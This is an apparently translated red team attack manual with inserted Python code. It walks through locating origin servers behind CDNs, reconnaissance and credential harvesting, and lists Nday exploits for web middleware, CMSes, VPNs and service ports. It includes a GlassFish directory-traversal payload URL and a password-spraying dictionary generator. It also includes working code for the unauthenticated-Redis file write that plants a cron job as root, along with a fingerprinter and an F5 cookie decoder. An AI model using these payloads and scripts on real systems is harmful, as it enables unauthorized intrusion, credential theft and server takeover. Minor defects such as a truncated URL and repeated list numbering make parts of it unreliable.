
Title: Red side personnel practical manual


Brief description of daily procedures

Entry access -> Intranet collection/detection -> AV evasion [not always required] -> Harvest login credentials -> Cross-platform lateral movement -> Entry maintenance -> Data exfiltration -> Regular access maintenance

0x01 Obtaining entry access [Early reconnaissance: the collection stage offers defenders few points to defend, and it is not where their defense is centered]

1. Find all the real IP ranges hidden behind the CDN

(1) Ping the target from many locations across the country and check whether the returned IP is unique; several different IPs indicate a CDN.
http://ping.chinaz.com/
https://tools.ipip.net/ping.php
https://www.17ce.com/
https://www.cdnplanet.com/tools/cdnfinder/

(2) Look up historical DNS resolution records to find the real IP the domain pointed to before the CDN was introduced.
https://x.threatbook.cn/
https://viewdns.info/
https://www.ip138.com/
http://toolbar.netcraft.com/site_report?url=
https://securitytrails.com/

(3) Enumerate subdomains and ping them in batch; the IP range the subdomains resolve to is usually the real range (the main site sits behind the CDN while the sub-sites often do not). Tools: Layer Subdomain Excavator, Google hacking
https://phpinfo.me/domain/
http://tool.chinaz.com/subdomain/
https://github.com/lijiejie/subDomainsBrute

(4) Search SSL certificates to find the real origin IP.
https://censys.io/
https://crt.sh/

(5) Resolve the domain name from hosts abroad.
https://asm.ca.com/zh_cn/ping.php
https://asm.saas.broadcom.com/zh_cn/register.php
https://dnscheck.pingdom.com

(6) Information leaks on the website itself: phpinfo pages, Apache status / JBoss status pages, web source code leaks, .svn leaks, GitHub leaks.

(7) Website email subscriptions: look for RSS / email subscription features. Many sites send mail from their own sendmail, and the raw source of such a mail contains the server's real IP.

(8) Compromise the CDN itself, through a vulnerability or a weak / socially engineered password.

(9) Obtain the real IP by scanning the whole Internet with ZMap and ZGrab.
https://www.ip2location.com/free/visitor-blocker
https://www.ipdeny.com/ipblocks/
https://www.t00ls.net/articles-40631.html (ZGrab)
https://levyhsu.com/2017/05/%e5%88%a9%e7%94%a8zgrab%e7%bb%95cdn%e6%89%be%e7%9c%9f%e5%ae%9eip/
http://bobao.360.cn/learning/detail/211.html (ZMap)

(10) Cyberspace search engines
ZoomEye: https://www.zoomeye.org
Shodan: https://www.shodan.io
Fofa: https://fofa.s

(11) Ping the bare (apex) domain: for example, instead of ping www.163.com, ping 163.com; the apex record is sometimes not behind the CDN.

(12) Ping the target's old domain names.

(13) F5 LTM cookie decoding. When the server sits behind an F5 LTM load balancer, the real IP can be recovered by decoding the BIGipServer Set-Cookie value, for example:
Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000
Take the first decimal field, 487098378, convert it to hexadecimal, 1d08880a, split it into bytes from back to front, 0a.88.08.1d, and convert each byte to decimal: 10.136.8.29 is the real IP.

2. Find the target's various web management backend login ports

(1) Batch crawl the web banners of all the target's real C-class ranges. Tool: iisput

(2) Batch scan and identify the basic service ports on all the target's real C-class ranges. Tools: Yujian Port Scan, Goby

(3) Test whether the target's DNS allows zone transfer; if it does not, fall back to brute forcing subdomains. DNS zone transfer with nslookup:

C:\Users\lj> nslookup
Default Server: UnKnown
Address: 211.82.100.1
> server dns1.thnu.edu.cn
Default Server: dns1.thnu.edu.cn
Address: 125.223.168.5
> ls thnu.edu.cn

Subdomain brute forcing: Layer

(4) Batch crawl the web banners of all target subdomains. Tool: Layer

(5) Batch scan and identify the basic service ports on all target subdomains. Tools: Yujian Port Scan, Goby

(6) Batch identify the web application fingerprint and exact version of every live web site
https://github.com/EdgeSecurityTeam/EHole
https://github.com/zhzyker/vulmap
http://finger.tidesec.com/
http://whatweb.bugscaner.com/look/
https://fp.shuziguanxing.com/#/
https://www.yunsee.cn/

(6) Search Git for sensitive files and account passwords leaked by the target; occasionally you will even run into a leaked cloud 'AccessKey'.
https://github.com/0xbug/Hawkeye
https://github.com/FeeiCN/GSIL

(6) Search network disks / Baidu Wenku for sensitive files and account passwords leaked by the target
http://www.daysou.com/ (network disk search)

(7) Find sensitive account passwords leaked by the target in third-party historical vulnerability databases [very useful for domestic targets] https://www.madebug.net/

(8) Sensitive files leaked through the target's exposed SVN directories. Tool: Seay SVN vulnerability exploit tool

(9) Website directory scanning [find sensitive files leaked by the target site: backup files, sensitive configuration files, source code, other people's webshells, etc.]. Tools: Yujian Directory, dirsearch
https://github.com/foryujian/yjdirscan
https://github.com/maurosoria/dirsearch

(10) Sensitive information leaked in the target site's own front-end code

(11) In-depth use of fofa / shodan / bing / Google hacking

(12) Collect target student IDs / employee IDs / email addresses [and batch-check those addresses against breach ("social engineering") databases for leaked passwords]. Student IDs: the official site and Tieba forums; employee IDs: the official site, breach databases and GitHub.

(13) Technical documents / wikis published by the target, which often contain account passwords and other sensitive information.

(14) The target's WeChat mini programs and official accounts

(15) Analyze the target app's web requests

(16) Use a JS probe to collect target intranet information

(17) Find ways to get into the target's internal QQ / WeChat groups

(18) Analyze the target's direct suppliers [especially technology outsourcing vendors]

(19) Build a targeted weak-password dictionary from all the information collected above https://xsshs.cn/xss.php?do=pass

(20) Identify the type of WAF the target uses and bypass it https://github.com/EnableSecurity/wafw00f (WAF identification)

(21) Bypass WAF: file upload / read / download

(22) Bypass WAF: SQL injection

(23) Bypass WAF: RCE

(24) Bypass WAF: known Nday vulnerabilities in various Java web middleware

(25) Bypass WAF: webshell AV evasion
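The F5 LTM cookie decoding from item 1 (13) above, as an added worked example that is not part of the original post. The cookie value and the expected 10.136.8.29 come from the text; the header block below is constructed, and the function names are mine. It handles only the plain (unencrypted) IPv4 form of the cookie; the encrypted, IPv6 and route-domain variants use different encodings and are reported as undecodable rather than guessed.

```python
import re
import struct
from typing import List, Optional, Tuple

# Plain (unencrypted) IPv4 form of the cookie value: "<ip as decimal>.<port as decimal>.0000"
_PLAIN_V4 = re.compile(r"^(\d{1,10})\.(\d{1,5})\.0000$")
# Any BIGipServer* cookie inside a raw header block
_BIGIP_COOKIE = re.compile(r"(BIGipServer[^=;\s]*)=([^;\s]+)")


def decode_bigip_cookie(value: str) -> Optional[Tuple[str, int]]:
    """Decode the unencrypted IPv4 BIG-IP persistence cookie into (ip, port).

    Both numbers are the pool member's address and port stored little-endian:
    487098378 -> 0x1d08880a -> bytes reversed 0a.88.08.1d -> 10.136.8.29,
    and 24095 -> 0x5e1f -> 0x1f5e -> 8030 (matching the pool name pool_8.29_8030).
    Returns None for values that are not in this format (encrypted / IPv6 / route-domain cookies).
    """
    m = _PLAIN_V4.match(value.strip())
    if not m:
        return None
    ip_int, port_int = int(m.group(1)), int(m.group(2))
    if ip_int > 0xFFFFFFFF or port_int > 0xFFFF:
        return None
    ip = ".".join(str(b) for b in struct.pack("<I", ip_int))   # little-endian bytes are the dotted quad
    port = struct.unpack(">H", struct.pack("<H", port_int))[0]  # swap the two port bytes
    return ip, port


def find_backends(raw_headers: str) -> List[Tuple[str, str, int]]:
    """Scan a raw HTTP response header block for BIGipServer cookies and decode each one."""
    found = []
    for name, value in _BIGIP_COOKIE.findall(raw_headers):
        decoded = decode_bigip_cookie(value)
        if decoded:
            found.append((name, decoded[0], decoded[1]))
    return found


# Constructed response headers that reuse the cookie quoted in the text above.
SAMPLE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: BigIP\r\n"
    "Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000; path=/\r\n"
    "Set-Cookie: JSESSIONID=abc123; Path=/; HttpOnly\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(find_backends(SAMPLE_HEADERS))  # [('BIGipServerpool_8.29_8030', '10.136.8.29', 8030)]
```

The address recovered this way is the pool member behind the load balancer, usually an internal address, so it tells you the backend's RFC 1918 range rather than an Internet-facing origin; that is still useful once you have a foothold on the intranet.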
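Item (19) above says to turn the collected information into a targeted weak-password dictionary but does not show how. The generator below is an added example, not code from the original post or the linked site: the seed words, years and suffix patterns are constructed for a hypothetical target, and the function names are mine. It combines case and leet variants of each seed with years and the suffixes that show up constantly in corporate passwords, pairs seeds with each other, and filters by length so the list stays usable for spraying.

```python
import itertools
from typing import Iterable, List

# Suffix patterns seen constantly in corporate weak passwords (extend from what you collect).
SUFFIXES = ["123", "1234", "123456", "!", "@123", "#123", "!@#", "666", "888"]
# Simple leet substitutions applied to the lower-case form of each seed.
LEET = str.maketrans({"a": "@", "o": "0", "i": "1", "e": "3", "s": "$"})


def word_variants(word: str) -> List[str]:
    """Case and leet variants of one seed word, deduplicated while keeping order."""
    w = word.strip()
    if not w:
        return []
    forms = [w, w.lower(), w.upper(), w.capitalize(), w.lower().translate(LEET)]
    return list(dict.fromkeys(forms))


def build_dictionary(seeds: Iterable[str], years: Iterable[int],
                     min_len: int = 6, max_len: int = 20) -> List[str]:
    """Combine seeds (company name, abbreviation, product, city ...) with years and suffixes.

    Returns a deduplicated list, most generic patterns first, with lengths in [min_len, max_len].
    """
    seeds = [s.strip() for s in seeds if s.strip()]
    years = [str(y) for y in years]
    short_years = [y[-2:] for y in years]  # 2020 -> "20"
    out: List[str] = []
    for seed in seeds:
        for base in word_variants(seed):
            out.append(base)
            out.extend(base + s for s in SUFFIXES)
            for y in years + short_years:
                out.extend([base + y, base + "@" + y, base + y + "!", base + "#" + y])
    # Pairs of seeds, e.g. company + department or company + city.
    for a, b in itertools.permutations(seeds, 2):
        out.extend([a.lower() + b.lower(), a.capitalize() + b.lower() + "123", a.lower() + "@" + b.lower()])
    seen = set()
    result: List[str] = []
    for cand in out:
        if min_len <= len(cand) <= max_len and cand not in seen:
            seen.add(cand)
            result.append(cand)
    return result


# Constructed seeds for a hypothetical target; not data from any real engagement.
DEMO = build_dictionary(["acme", "AcmeCorp", "shanghai"], [2019, 2020])

if __name__ == "__main__":
    print(len(DEMO), DEMO[:10])
```

Keep the list short and ordered by likelihood: most lockout policies (for example the Tomcat lockout realm mentioned later, or Exchange / AD lockout thresholds) tolerate only a handful of failures per account, so one or two of the best candidates per user sprayed slowly across all users beats a long dictionary against one account.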

More to be added and corrected.

0x02 Obtaining entry access [The external defense focus ("top priority")]

This stage mainly targets known Nday vulnerabilities in the mainstream 'middleware + open source programs + web service components'.

The following is sorted by 'difficulty of exploitation in practice' and 'level of shell privilege obtained'. Since it is driven entirely by practical use, I have only selected the 'middleware', 'open source programs' and 'web components' that are relatively common and genuinely help with getting a shell in practice.

Known Nday exploits for various Java middleware

Unlike script-based web applications, Java applications usually run with relatively high privileges, and many run directly as root / Administrator / SYSTEM.

The shell obtained is therefore usually highly privileged, often amounting to full control of the server.

In red team scenarios in particular, attackers generally go for these points first and use them as the breakthrough to obtain a stable foothold.

Which industries favour which middleware should also be analyzed and summarized in advance.

Struts2
Struts2-005, Struts2-008, Struts2-009, Struts2-013, Struts2-016 (in practice many old systems never patched this one, so the success rate is high), Struts2-019, Struts2-020, Struts2-devmode, Struts2-032, Struts2-033, Struts2-037, Struts2-045, Struts2-046, Struts2-048, Struts2-052, Struts2-053, Struts2-057
Exploitation tool: https://github.com/HatBoy/Struts2-Scan

WebLogic
CVE-2019-2725

CVE-2019-2729, CVE-2018-3191, CVE-2018-2628, CVE-2018-2893, CVE-2018-2894, CVE-2017-3506, CVE-2017-10271, CVE-2017-3248, CVE-2016-0638, CVE-2016-3510, CVE-2015-4852, CVE-2014-4210 (SSRF)
Weak console password, deploy a webshell
Detection and exploitation tools: https://github.com/0xn0ne/weblogicScanner (detection), https://github.com/zhzyker/expub/tree/master/weblogic (exploitation)

JBoss
CVE-2015-7501

CVE-2017-7504, CVE-2017-12149
Unauthenticated access, deploy a webshell
Weak console password, deploy a webshell
Exploitation tools: https://github.com/joaomatosf/jexboss, https://github.com/joaomatosf/JavaDeserH2HC

WildFly [JBoss AS was renamed WildFly from version 8 onward]
Weak console password, deploy a webshell

Tomcat
CVE-2016-8735 (JMX RMI deserialization)
CVE-2017-12615 [requires readonly=false on the default servlet, which is rarely configured, so of limited use]
CVE-2020-1938 [AJP protocol vulnerability (Ghostcat); few people expose port 8009 to the Internet, so of limited use]
Weak manager console password, deploy a webshell [note: from 7.x a brute-force lockout (LockOutRealm) is enabled by default]
Exploit summaries: https://blog.csdn.net/weixin_42918771/article/details/104844367, https://mp.weixin.qq.com/s/ZXoCJ9GhMaTvVFeYn8vMUA, https://saucer-man.com/information_security/507.html#cl-11

Jenkins
CVE-2018-1999002 [arbitrary file read]

Unauthenticated access (script console), arbitrary command execution
Weak console password, arbitrary command execution
Exploit summaries: https://www.cnblogs.com/junsec/p/11593556.html, https://misakikata.github.io/2020/03/Jenkins%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88%E5%A4%8D%E7%8E%B0/, https://github.com/gquere/pwn_jenkins

ElasticSearch
CVE-2014-3120 [RCE, specifically for old versions (no sandbox)]

CVE-2015-1427 [Groovy sandbox bypass RCE]
CVE-2015-3337 [arbitrary file read]
Unauthenticated access, sensitive information leak
Vulnerability summaries: https://jishuin.proginn.com/p/763bfbd3aa0d, https://mp.weixin.qq.com/s?__biz=MzAwMjgwMTU1Mg==&mid=2247484799&idx=2&sn=b91f5bc7a31f5786a66f39599ea44bff, https://blog.csdn.net/u011066706/article/details/51175761, https://www.cnblogs.com/AtesetEnginner/p/12060537.html

RabbitMQ
Weak password: the default account is guest/guest (default ports: 15672, 25672, 15692)

GlassFish
Arbitrary file read [low versions]
Weak console password, deploy a webshell
Exploit: http://ip:port/theme/META-INF/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./xxxpath/xxxfile
https://www.lxhsec.com/2019/03/04/middleware/

IBM WebSphere
Java deserialization

Weak console password, deploy a webshell
Exploit: https://www.lxhsec.com/2019/03/04/middleware/, https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/WebSphere/CVE-2020-4643%20IBM%20WebSphere%E5%AD%98%E5%9C%A8XXE%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/, https://github.com/Ares-X/VulWiki, https://xz.aliyun.com/t/8248

Axis2
Arbitrary file read

Directory traversal
Exploit: https://xz.aliyun.com/t/6196, https://paper.seebug.org/1489/#23-axis2, https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Apache%20Axis/%EF%BC%88CVE-2019-0227%EF%BC%89Apache%20Axis%201.4%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/, https://github.com/CaledoniaProject/AxisInvoker, https://github.com/Fnzer0/Axis-RCE, https://paper.seebug.org/1489/

Apache ActiveMQ
Unauthenticated access; before 5.12 the fileserver allows arbitrary file write via PUT

CVE-2015-5254
Exploit: http://wiki.sentrylab.cn/0day/ActiveMQ/3.html, https://www.freebuf.com/column/161188.html, https://www.taodudu.cc/news/show-2345492.html

Apache Solr
CVE-2017-12629

CVE-2019-0193 [Apache Solr 5.x - 8.2.0]
Exploit: https://xz.aliyun.com/search?keyword=Solr, https://www.jianshu.com/p/43e7f13e2058, https://caiqiqi.github.io/2019/11/03/Apache-Solr%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86/, https://cloud.tencent.com/developer/article/1810723, http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Solr/?h=Apache%20Solr

Apache Zookeeper
Unauthenticated access, sensitive information leak

Apache Shiro
Deserialization

fastjson
<= 1.2.47 deserialization exploitation
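Before throwing Nday exploits at the middleware listed above you need to know which one you are looking at; the batch fingerprinting step in 0x01 is usually done with tools like EHole, but the logic is simple. The block below is an added example, not code from the original post or from any of those tools: it tags captured HTTP responses with a small rule set built from markers practitioners commonly rely on (the Tomcat error page and Apache-Coyote header, the WebLogic console path and RFC 2068 error text, the JBoss X-Powered-By header, the X-Jenkins header, and Shiro's rememberMe=deleteMe Set-Cookie reply, which Shiro sends back when a request carries any rememberMe cookie it cannot parse). The rule names, data classes and sample responses are mine and constructed; tune the markers to the target.

```python
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class HttpResponse:
    """A minimal captured HTTP response: status code, headers (Set-Cookie joined with ';') and body."""
    status: int
    headers: Dict[str, str]
    body: str


@dataclass
class Rule:
    """One fingerprint; any single matching header or body marker is enough to tag the response."""
    name: str
    headers: Dict[str, str] = field(default_factory=dict)  # header name -> substring ("" = present)
    body: List[str] = field(default_factory=list)           # substrings expected in the body


# Commonly used markers for the middleware discussed above (constructed rule set, extend per target).
RULES = [
    Rule("Apache Tomcat", headers={"server": "apache-coyote"}, body=["apache tomcat/"]),
    Rule("Oracle WebLogic", body=["/console/login/loginform.jsp",
                                  "from rfc 2068 hypertext transfer protocol"]),
    Rule("JBoss AS", headers={"x-powered-by": "jboss"}, body=["jboss"]),
    Rule("Jenkins", headers={"x-jenkins": ""}, body=["jenkins-session"]),
    Rule("Apache Shiro", headers={"set-cookie": "rememberme=deleteme"}),
]


def fingerprint(resp: HttpResponse) -> List[str]:
    """Return the names of every rule that matches the response (case-insensitive)."""
    hdrs = {k.lower(): v.lower() for k, v in resp.headers.items()}
    body = resp.body.lower()
    hits = []
    for rule in RULES:
        header_hit = any(name in hdrs and needle in hdrs[name]
                         for name, needle in rule.headers.items())
        body_hit = any(marker in body for marker in rule.body)
        if header_hit or body_hit:
            hits.append(rule.name)
    return hits


def fingerprint_all(samples: Dict[str, HttpResponse]) -> Dict[str, List[str]]:
    """Batch form: host label -> list of matched middleware names."""
    return {label: fingerprint(resp) for label, resp in samples.items()}


# Constructed sample responses (not real captures).
SAMPLES = {
    "10.0.0.5:8080": HttpResponse(404, {"Server": "Apache-Coyote/1.1"},
                                  "<h1>HTTP Status 404</h1><h3>Apache Tomcat/7.0.56</h3>"),
    "10.0.0.6:7001": HttpResponse(404, {"Content-Type": "text/html"},
                                  "From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1: 404 Not Found"),
    "10.0.0.7:8080": HttpResponse(200, {"Set-Cookie": "rememberMe=deleteMe; Path=/; Max-Age=0",
                                        "Server": "Apache-Coyote/1.1"},
                                  "<html>login</html>"),
    "10.0.0.8:80": HttpResponse(200, {"Server": "nginx"}, "<html>hello</html>"),
}

if __name__ == "__main__":
    for host, names in fingerprint_all(SAMPLES).items():
        print(host, names)
```

For Shiro specifically the probe is active: send a request with `Cookie: rememberMe=anything` and look for `rememberMe=deleteMe` in the reply, which is what the third sample represents. The same host can match more than one rule (Shiro on Tomcat), which is expected and useful.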

Various Windows PHP integrated environments [the webshell obtained in these environments usually has high privileges, so they are a first choice for red team personnel]

AppServ

XAMPP

Baota panel (宝塔 / BT Panel)

PhpStudy


Known Nday exploits for various open source programs

DedeCMS: admin backend weak password, series of known Nday exploits

ThinkPHP 5.x: admin backend weak password, series of known Nday exploits

PHPCMS: admin backend weak password, series of known Nday exploits

ECShop: admin backend weak password, series of known Nday exploits

MetInfo: admin backend weak password, series of known Nday exploits

Discuz: admin backend weak password, series of known Nday exploits

EmpireCMS: admin backend weak password, series of known Nday exploits

phpMyAdmin: database weak password, series of known Nday exploits

WordPress: admin backend weak password, series of known Nday exploits

Joomla: admin backend weak password, series of known Nday exploits

Drupal: CVE-2018-7600, admin backend weak password, series of known Nday exploits


Known Nday exploits for various other web components

IIS 6.0: short file name disclosure; WebDAV PUT arbitrary file write; WebDAV RCE CVE-2017-7269

ZenTao project management system: SQL injection, file read, remote execution

Tongda OA: SQL injection, arbitrary file upload

Exchange: enumerate mailbox usernames through its interfaces; weak-password spraying against each interface; CVE-2020-0688 [prerequisite: you must first hold the credentials of any mailbox user]


Zimbra [XXE + SSRF = RCE]: CVE-2013-7091, CVE-2016-9924, CVE-2019-9670

Citrix: CVE-2019-19781

JumpServer: authentication bypass

Zabbix: CVE-2017-2824; SQL injection [old 2.0 versions]; weak console password leading to sensitive host information leak

Cacti: SQL injection in some versions; weak console password

Nagios: CVE-2016-9565; weak console password

Webmin RCE: CVE-2019-15107

PHPMailer: CVE-2016-10033

Weaver (Fanwei) OA remote code execution

Kingdee OA SQL injection

Coremail sensitive file leak

UEditor arbitrary file upload

OpenSSL Heartbleed: grab plaintext account passwords from leaked memory

Bash Shellshock

Various common basic web vulnerabilities that can quickly lead to a shell [note: some of these are hard to detect effectively and blindly without reviewing the code]

Weak backend password

SSRF

SQL injection

Broken access control (horizontal / vertical privilege bypass)

Command/Code Execution/Deserialization

Arbitrary file upload / download / read

File inclusion

XSS (in practice XSS is only valuable when aimed at specific mailboxes and paired with a browser 0day; it is not very lethal in red team scenarios)

Business logic vulnerability

Various border network devices: mainly weak web management console passwords and known Nday attacks.

Pulse Secure VPN: CVE-2019-11510 [arbitrary file read]

Fortinet VPN: CVE-2018-13379 [file read]

Sangfor VPN RCE

0x03 Obtaining entry access [Getting a shell through various basic service ports; defense focus ("top priority")]

Here I only select the services that genuinely help with getting a shell in practice; other, more marginal services are not covered.

As before, the ordering is based on 'difficulty of exploitation in practice' and 'level of shell privilege obtained'.

Below is a brief description of the specific attack methods for each port.

Top port list

MSSQL [default tcp/1433: weak password, sensitive account/password leak, privilege escalation, remote execution, backdoor implant]

SMB [default tcp/445: weak password, remote execution, backdoor implant]

WMI [default tcp/135: weak password, remote execution, backdoor implant]

WinRM [default tcp/5985; mainly relevant on newer Windows versions: weak password, remote execution, backdoor implant]

RDP [default tcp/3389: weak password, remote execution, sticky-keys (shift) backdoors left behind by others]

SSH [default tcp/22: weak password, remote execution, backdoor implant]

Oracle [default tcp/1521: weak password, sensitive account/password leak, privilege escalation, remote execution, backdoor implant]

MySQL [default tcp/3306: weak password, sensitive account/password leak, privilege escalation (only on some old systems)]

Redis [default tcp/6379: weak password, unauthenticated access, file write (webshell, startup items, scheduled tasks), privilege escalation]

PostgreSQL [default tcp/5432: weak password, sensitive information leak]

LDAP [default tcp/389: unauthenticated (anonymous) bind, weak password, sensitive account/password leak]

SMTP [default tcp/25: username enumeration, weak password, sensitive information leak caused by service misconfiguration]

POP3 [default tcp/110: weak password, sensitive information leak]

IMAP [default tcp/143: weak password, sensitive information leak]

Exchange [default tcp/443: weak-password spraying against OWA, EWS, OAB and Autodiscover; pass-the-hash to pull mail; sensitive information leak]

VNC [default tcp/5900: weak password]

FTP [default tcp/21: weak password, anonymous access / writable, sensitive information leak]

Rsync [default tcp/873: unauthenticated access, weak password, sensitive information leak]

MongoDB [default tcp/27017: unauthenticated access, weak password]

Telnet [default tcp/23: weak password, backdoor implant]

SVN [default tcp/3690: weak password, sensitive information leak]
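The Redis entry above lists "unauthenticated access, file write (webshell, startup items, scheduled tasks)" without showing the exchange. The block below is an added example, not code from the original post: it encodes the four-command sequence that abuses an unauthenticated Redis (CONFIG SET dir / dbfilename, SET a key holding the payload, SAVE) as RESP, the wire format redis-cli speaks, and parses the replies so you can tell an open instance from one that is hardened. The server transcripts are constructed, not captures, and every function name is mine. It never opens a socket; pair it with a real connection only on systems you are authorized to test.

```python
from typing import Any, List, Tuple


class RedisError(Exception):
    """A RESP error reply (e.g. NOAUTH, protected mode, or a renamed CONFIG command)."""


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, exactly as redis-cli sends it."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$" + str(len(raw)).encode() + b"\r\n" + raw + b"\r\n")
    return b"".join(parts)


def parse_reply(data: bytes) -> Tuple[Any, bytes]:
    """Parse one RESP reply and return (value, unconsumed bytes). Error replies are returned, not raised."""
    kind, rest = data[:1], data[1:]
    line, sep, rest = rest.partition(b"\r\n")
    if not sep:
        raise ValueError("incomplete reply")
    if kind == b"+":                      # simple string, e.g. +OK
        return line.decode(), rest
    if kind == b"-":                      # error, e.g. -NOAUTH ...
        return RedisError(line.decode()), rest
    if kind == b":":                      # integer
        return int(line), rest
    if kind == b"$":                      # bulk string ($-1 is nil)
        n = int(line)
        if n < 0:
            return None, rest
        return rest[:n].decode(), rest[n + 2:]
    if kind == b"*":                      # array of nested replies
        items = []
        for _ in range(int(line)):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type {kind!r}")


def file_write_sequence(directory: str, filename: str, payload: str) -> List[bytes]:
    """The classic unauthenticated-Redis file write: aim the RDB dump at a chosen path, then SAVE.

    The payload is wrapped in blank lines so that the RDB binary framing around it
    does not break a line-oriented consumer such as cron or sshd's authorized_keys.
    """
    return [
        encode_command("CONFIG", "SET", "dir", directory),
        encode_command("CONFIG", "SET", "dbfilename", filename),
        encode_command("SET", "x", "\n\n" + payload + "\n\n"),
        encode_command("SAVE"),
    ]


def replay(commands: List[bytes], server_bytes: bytes) -> List[Any]:
    """Pair each sent command with one reply taken in order from a server byte stream."""
    replies, rest = [], server_bytes
    for _ in commands:
        value, rest = parse_reply(rest)
        replies.append(value)
    return replies


def sequence_succeeded(replies: List[Any]) -> bool:
    """Every step must have answered +OK for the file to land on disk."""
    return all(r == "OK" for r in replies)


# Constructed server transcripts (not real captures).
OPEN_SERVER = b"+OK\r\n" * 4                                   # unauthenticated, nothing renamed
HARDENED_SERVER = b"-NOAUTH Authentication required.\r\n" * 4  # requirepass set
RENAMED_CONFIG = b"-ERR unknown command `CONFIG`, with args beginning with: `SET`, `dir`\r\n" * 2

if __name__ == "__main__":
    cmds = file_write_sequence("/var/spool/cron", "root", "* * * * * /bin/true")
    print(sequence_succeeded(replay(cmds, OPEN_SERVER)))      # True
    print(sequence_succeeded(replay(cmds, HARDENED_SERVER)))  # False
```

On the defensive side the same three replies are what you want to see from your own Redis: a NOAUTH error (requirepass set), an unknown-command error for CONFIG (rename-command in redis.conf), or no connection at all because the instance is bound to localhost with protected mode on; any +OK to CONFIG SET dir from an unauthenticated client means an attacker can write files as the redis user.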
